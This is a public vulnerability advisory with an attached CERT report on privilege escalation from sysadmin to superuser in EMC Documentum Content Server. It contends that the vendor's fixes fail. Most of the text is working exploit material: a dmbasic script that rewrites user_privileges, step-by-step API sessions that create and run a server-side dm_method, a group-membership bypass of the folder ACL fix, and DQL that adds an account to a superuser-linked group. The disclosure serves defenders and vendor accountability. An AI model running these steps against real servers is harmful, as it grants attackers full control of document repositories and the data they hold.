Product: EMC Documentum Content Server
Vendor: EMC
Version: ANY
CVE: N/A
Risk: High
Status: public/not fixed
In 2011 Yuri Simone discovered a security flaw in EMC Documentum Content
Server, which allows users with sysadmin privileges to elevate their
privileges to superuser (see CVE-2011-4144). On April 2014 I discovered
another set of vulnerabilities related to CVE-2011-4144 (see attached
VRF#HUDHKNW4.txt). On September 2014 vendor announced a fix (see
CVE-2014-4622) for the first only vulnerability from VRF#HUDHKNW4.txt (check
row 5 in CERT's spreadsheet for VU#315340
(http://www.kb.cert.org/vuls/id/315340)). Yesterday vendor announced a new
fix (see CVE-2015-4531) related to VRF#HUDHKNW4.txt. Besides the fact that
CVE-2015-4531 has a completely wrong description, CVE-2015-4531 does not
introduce any security fixes. I believe that there are about a dozen of
options to elevate privileges from sysadmin to superuser, but I'm going to
describe the most obvious one.
1. If attacker is able to create (or modify) docbase method (object with
dm_method type) he is able to elevate his privileges through executing this
method, example:
cat > test.ebs
Const CONNECTION_ERROR As Integer = 33
Sub rmain(d As String, u As String, g As String)
s$ = dmAPIGet("connect," & d & "," & u & ",")
If s = "" Then
dmExit(CONNECTION_ERROR)
End If
q$ = "update dm_user objects" & _
" set user_privileges=16" & _
" where user_name='" & g & "'"
s=dmAPIExec("execquery," & s & ",T," & q)
End Sub
API> create,c,dm_method
...
10024be98001f92d
API> set,c,l,object_name
SET> test
...
OK
API> setfile,c,l,test.ebs,crtext
...
OK
API> set,c,l,method_verb
SET> ./dmbasic -ermain
...
OK
API> set,c,l,run_as_server
SET> T
...
OK
API> set,c,l,use_method_content
SET> T
...
OK
API> set,c,l,method_type
SET> dmbasic
...
OK
API> save,c,l
...
OK
API> retrieve,c,dm_user where user_name='test'
...
11024be980000e8a
API> get,c,l,user_privileges
...
0
API> apply,c,,DO_METHOD,METHOD,S,test,
ARGUMENTS,S,'repo dmadmin test'
...
q0
API> retrieve,c,dm_user where user_name='test'
...
11024be980000e8a
API> get,c,l,user_privileges
...
16
2. for the reason mentioned above regular users are unable to create or
modify docbase methods:
API> create,c,dm_method
...
10024be98001f954
API> save,c,l
...
[DM_METHOD_E_NEED_PRIV_FOR_CHANGE]error: "The current user (test)
needs to have superuser or sysadmin privilege to save or destroy
dm_method object."
3. But sysadmins were able to create docbase methods. Now if sysadmin tries
to create docbase method it gets following error:
API> create,c,dm_method
...
10024be98001f968
API> set,c,l,object_name
SET> test1
...
OK
API> setfile,c,l,test.ebs,crtext
...
OK
API> set,c,l,method_verb
SET> ./dmbasic -ermain
...
OK
API> save,c,l
...
[DM_SYSOBJECT_E_LINK_PERMIT2]error: "Linking or unlinking to the folder
'/System/Methods' failed on sysobject '10024be98001f968'.
WRITE permit is required on the folder, when using folder security."
4. So, it is obvious that remediation provided by vendor relies on ACL
restrictions for /System/Methods folder, the problem is vendor does not take
into account that Content Server has a set of groups which allow to bypass
ACL restrictions and are still manageable by sysadmin users, example:
API> ?,c,alter group dm_escalated_write add testadmin
API> create,c,dm_method
...
10024be98001f969
API> set,c,l,object_name
SET> test1
...
OK
API> setfile,c,l,test.ebs,crtext
...
OK
API> set,c,l,method_verb
SET> ./dmbasic -ermain
...
OK
API> save,c,l
...
OK
__
Regards,
Andrey B. Panfilov
Vulnerability Report Confirmation - [VRF#HUDHKNW4]
Your vulnerability report has been successfully received. You may save
or print this page for your own records. The Report Tracking ID assigned
to this report is VRF#HUDHKNW4. Details of your report are listed below.
If you have any questions or require additional information, please call
the CERT Hotline at +1 412-268-7090 or send email to cert@xxxxxxxx
<mailto:cert@xxxxxxxx?subject=VRF%20question%20VRF#HUDHKNW4>. Please
reference this Report Tracking ID: VRF#HUDHKNW4.
Do not use the back button to submit another report. Click here
<https://forms.cert.org/VulReport/index.jsp> instead.
------------------------------------------------------------------------
Vulnerability Report
Name Andrey B. Panfilov
Organization independent
Email Address andrew@xxxxxxxxxxxx
Telephone Number
Vulnerability Description EMC Documentum Content Server: ESA-2012-009
was not properly analyzed and fixed.
According to ESA-2012-009 user with sysadmin privilege should not able
to elevate his privileges, nevertheless documentation does not describe
some sysadmin capabilities that leads to privilege elevation:
1. Sysadmin is not able to modify dm_superusers_dynamic and
dm_superusers system groups (dm_superusers membership grants superuser
privileges), but he is able to modify groups that belongs to
dm_superusers system group (Content Server by default creates
dcs_privileged_users group which belongs to dm_superusers system group,
and sysadmin is able to modify dcs_privileged_users group and, so, gain
superuser privileges):
API> ?,c,alter group dm_superusers add testadmin
[DM_QUERY_E_BAD_GROUP_SAVE]error: "CREATE or ALTER GROUP: Unable to save
the group."
[DM_GROUP_E_NEED_SUPER_USER_PRIV]error: "The current user (testadmin)
needs to have superuser privilege to save the group object."
API> ?,c,alter group dm_superusers_dynamic add testadmin
[DM_QUERY_E_BAD_GROUP_SAVE]error: "CREATE or ALTER GROUP: Unable to save
the group."
[DM_GROUP_E_NEED_SUPER_USER_PRIV]error: "The current user (testadmin)
needs to have superuser privilege to save the group object."
API> ?,c,select groups_names from dm_group where group_name='dm_superusers'
groups_names
-----------------------
dcs_privileged_users
dm_superusers_dynamic
(2 rows affected)
API> ?,c,update dm_group object set is_dynamic=FALSE where
group_name='dcs_privileged_users'
objects_updated
---------------
1
(1 row affected)
[DM_QUERY_I_NUM_UPDATE]info: "1 objects were affected by your UPDATE
statement."
API> ?,c,alter group dcs_privileged_users add testadmin
OK
2. sysadmin is able to perform dump and load operations, so he is able
to create malicious superusers through load operation
3. sysadmin is able to create dm_method objects, so he is able to
execute any code on Content Server and thereby elevate privileges:
API> ?,c,create dm_method object set object_name='test method', set
method_verb='echo test_method > /tmp/test', set method_type='programm',
set run_as_server=TRUE
object_created
----------------
1001ffd7800f07bc
(1 row affected)
API> ?,c,execute do_method with method='test method'
....
(1 row affected)
Bye ~ ]$ cat /tmp/test test_method ~ ]$
4. sysadmin is able to create/modify dm_client_rights objects, these
objects store information about capabilities of remote clients, like
ability to perform trusted authentication and use dynamic groups, so by
creating/modifying dm_client_rights objects sysadmin is able to elvate
privileges
5. sysadmin is able to create/modify dmc_module objects, these objects
"contains" java code, that is executed on java-clients, Documentum Java
Method Server for example, so sysadmin is able to execute any code on
Documentum Java Method Server and thereby elevate privileges
Can we provide your name to the vendor? Yes
Do you want to be publicly acknowledged? Yes
Vendor Contact Status will not contact
Vendor Name EMC
Vendor Contact Name
Vendor Contact Email
Vendor Contact Telephone Number
Vendor Tracking ID
Additional Vendor Information
Affected System Configurations All versions of EMC Documentum Content Server
How was this vulnerability found?
Is the vulnerability being exploited? Yes
Is there a public exploit? No
Vulnerability Impact The same as ESA-2012-009
Comments
Attached File
Date 2014-04-23T23:23:57
Report Tracking ID VRF#HUDHKNW4
CERT Tracking IDs
------------------------------------------------------------------------
Carnegie Mellon University <http://www.cmu.edu/>
©2014 Carnegie Mellon University <http://www.cmu.edu/>
